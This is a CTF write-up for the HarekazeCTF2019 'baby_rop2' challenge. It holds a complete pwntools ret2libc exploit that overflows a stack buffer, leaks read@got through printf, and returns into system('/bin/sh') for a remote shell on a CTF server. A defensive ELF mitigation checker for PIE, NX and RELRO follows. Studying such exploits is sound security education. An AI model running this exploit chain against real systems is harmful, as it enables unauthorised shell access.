[HarekazeCTF2019]baby_rop2


ret2libc

Leak the resolved address of read through printf, use it to compute the libc base, and then build a ROP chain that calls system('/bin/sh').

from pwn import *

r = remote('node3.buuoj.cn', 26686)
elf = ELF('./babyrop2')
libc = ELF('./libc.so.6')

# gadgets and fixed addresses in the (non-PIE) binary
rdi_ret = 0x400733        # pop rdi; ret
rsi_r15_ret = 0x400731    # pop rsi; pop r15; ret
format_str = 0x400770     # "%s" string inside the binary
read_got = elf.got['read']
printf_plt = elf.plt['printf']
main_addr = 0x400636

# stage 1: overflow the 0x20-byte buffer plus the saved rbp, then call
# printf("%s", read@got) to leak the resolved address of read and return to main
payload = b'a' * 0x20 + b'b' * 0x8
payload += p64(rdi_ret) + p64(format_str)
payload += p64(rsi_r15_ret) + p64(read_got) + p64(0)
payload += p64(printf_plt) + p64(main_addr)

r.recvuntil(b"What's your name?")
r.sendline(payload)

# the pointer is printed as raw bytes; keep the 6 significant bytes ending in 0x7f
read_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc_base = read_addr - libc.symbols['read']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))

# stage 2: same overflow, now returning into system("/bin/sh")
payload2 = b'a' * 0x20 + b'b' * 0x8 + p64(rdi_ret) + p64(binsh_addr) + p64(system_addr) + p64(main_addr)
r.recvuntil(b"What's your name?")
r.sendline(payload2)

r.interactive()
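The chain above only works because the binary is not position-independent (gadgets and main sit at fixed 0x4006xx addresses) and its stack is non-executable but its GOT is readable. As an added example, not part of the original writeup, here is a small checker that parses an ELF64 header and its program headers and reports the PIE / NX / RELRO status a defender would verify before shipping a binary; the ELF images it inspects are constructed inline.

```python
import struct

PT_GNU_STACK = 0x6474e551   # program header describing the stack's permissions
PT_GNU_RELRO = 0x6474e552   # program header marking the read-only-after-relocation region
PF_X = 1
ET_EXEC, ET_DYN = 2, 3      # ET_DYN is what a PIE executable (or a shared object) uses


def check_mitigations(data: bytes) -> dict:
    """Report PIE, NX and (partial or full) RELRO from an ELF64 image."""
    if data[:4] != b'\x7fELF' or data[4] != 2:        # EI_CLASS must be ELFCLASS64
        raise ValueError('not an ELF64 image')
    e_type = struct.unpack_from('<H', data, 16)[0]
    e_phoff = struct.unpack_from('<Q', data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from('<HH', data, 54)
    nx = False       # no PT_GNU_STACK entry means the loader gives an executable stack
    relro = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, p_flags = struct.unpack_from('<II', data, off)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {'pie': e_type == ET_DYN, 'nx': nx, 'relro': relro}


def build_sample(pie: bool, nx: bool, relro: bool) -> bytes:
    """Constructed minimal ELF64 image: header plus program headers only (hypothetical, not a real binary)."""
    phdrs = [struct.pack('<IIQQQQQQ', PT_GNU_STACK, 6 if nx else 7, 0, 0, 0, 0, 0, 16)]
    if relro:
        phdrs.append(struct.pack('<IIQQQQQQ', PT_GNU_RELRO, 4, 0, 0, 0, 0, 0, 1))
    ident = b'\x7fELF' + bytes([2, 1, 1]) + b'\x00' * 9   # ELFCLASS64, little-endian, version 1
    hdr = ident + struct.pack('<HHIQQQIHHHHHH',
                              ET_DYN if pie else ET_EXEC, 0x3e, 1, 0x400636,
                              64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    return hdr + b''.join(phdrs)


if __name__ == '__main__':
    # a non-PIE, NX-enabled, no-RELRO layout like the one the writeup targets
    print(check_mitigations(build_sample(pie=False, nx=True, relro=False)))
```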

 

